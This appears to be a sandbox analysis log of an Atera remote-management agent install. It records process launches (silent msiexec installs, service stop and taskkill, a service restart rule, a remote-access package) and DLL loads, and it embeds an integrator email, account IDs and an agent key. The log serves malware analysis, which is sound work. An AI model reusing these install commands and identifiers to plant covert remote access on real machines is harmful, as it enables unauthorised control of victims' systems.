                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="barrostransportes2018@gmail.com" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000MHGA9IAP" /AgentId="3757c761-9e50-4f15-8086-0e584dceea48"
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSID8C1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5036234 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "c0a02000-d8db-4c72-a990-e7e78fb2c44b" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "08ea1206-2fa8-46b2-a7c8-5fb30d3b6805" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "7cd28163-b1ef-497f-b073-8581f0695073" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "cc07350c-f483-47f0-a322-e5655b4447fa" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "463fd9d0-b270-46be-8e66-442f10d730f6" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000MHGA9IAP
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "8a9134ff-5e44-480a-9a18-d667aeeec188" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k smphost
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "5fd723dc-67af-48d2-add5-cb21dbd46c10" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "d4d269d4-e88c-4b28-b73e-8aa8339ce0f7" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "10a783e3-c632-4a9e-aced-d9359a7beffe" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "83c4b87a-e204-4da6-bcee-e7b8e82431d2" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000MHGA9IAP
                                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "66f79428-b794-442f-982d-2e0a02b56009" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "487fa34b-77da-4f1b-8f72-efcd0c681b03" agent-api.atera.com/Production 443 or8ixLi90Mf "agentprovision" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C5D300CFA650AF8B39098EE9450EC910 E Global\MSI0000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "536561ff-dfee-40bc-945b-5b9b9c53fde8" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000MHGA9IAP
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 460615119F137567DDB08B202FD1B71FJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0C14E813FE9B8F63433BCCF076E5DD5E E Global\MSI0000Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="barrostransportes2018@gmail.com" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000MHGA9IAP" /AgentId="3757c761-9e50-4f15-8086-0e584dceea48"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C5D300CFA650AF8B39098EE9450EC910 E Global\MSI0000Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI9B15.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5020687 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentIdJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIA259.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5022328 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStartJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIB4E8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5027093 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallationJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSID8C1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5036234 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEndJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "c0a02000-d8db-4c72-a990-e7e78fb2c44b" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "08ea1206-2fa8-46b2-a7c8-5fb30d3b6805" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "7cd28163-b1ef-497f-b073-8581f0695073" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "cc07350c-f483-47f0-a322-e5655b4447fa" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "463fd9d0-b270-46be-8e66-442f10d730f6" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "5fd723dc-67af-48d2-add5-cb21dbd46c10" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "d4d269d4-e88c-4b28-b73e-8aa8339ce0f7" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "10a783e3-c632-4a9e-aced-d9359a7beffe" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "83c4b87a-e204-4da6-bcee-e7b8e82431d2" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "66f79428-b794-442f-982d-2e0a02b56009" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "487fa34b-77da-4f1b-8f72-efcd0c681b03" agent-api.atera.com/Production 443 or8ixLi90Mf "agentprovision" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
